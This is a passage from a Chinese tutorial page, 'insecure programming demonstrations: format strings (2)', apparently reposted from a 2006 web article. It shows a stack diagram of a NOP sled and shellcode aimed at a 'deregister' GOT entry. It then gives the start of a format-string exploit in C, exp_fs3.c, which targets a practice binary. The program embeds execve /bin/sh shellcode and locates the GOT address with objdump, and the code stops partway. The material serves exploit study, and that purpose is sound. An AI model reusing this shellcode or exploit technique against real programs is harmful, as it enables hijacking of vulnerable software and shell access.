非安全编程演示之格式化字符串(2)

　2006-04-02 20:26:42　来源：WEB开发网　　　

核心提示： | ||-| <-0xb f f f f a d 7| shellcode ||-|| NOP || NOP || NOP | > 0xb f f f 95c0| NOP || NOP ||-|| deregister address ||-| <-0xb f f f 3

| |
|-------------------------| <-----0xb f f f f a d 7
| shellcode |
|-------------------------|
| NOP |
| NOP |
| NOP | > 0xb f f f 95c0
| NOP |
| NOP |
|-------------------------|
| deregister address |
|-------------------------| <-----0xb f f f 3a d7
| |

演示exploit：
/*
** exp_fs3.c
** Coded by Core Security - info@core-sec.com
*/

#include <string.h>
#include <stdio.h>
#include <unistd.h>

#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs3"
#define GREP "/bin/grep"

/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void) {

char evil_buffer[49149 + 1], temp_buffer[64];
char *p;
int deregister_address;
FILE *f;

sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &deregister_address) != 1) {
pclose(f);
printf("Error: Cannot find deregister address in GOT!\n");
exit(1);
}

printf("deregister address is: 0x%x\n", deregister_address);

上一页 1 2 3 4 5 6 7 8 下一页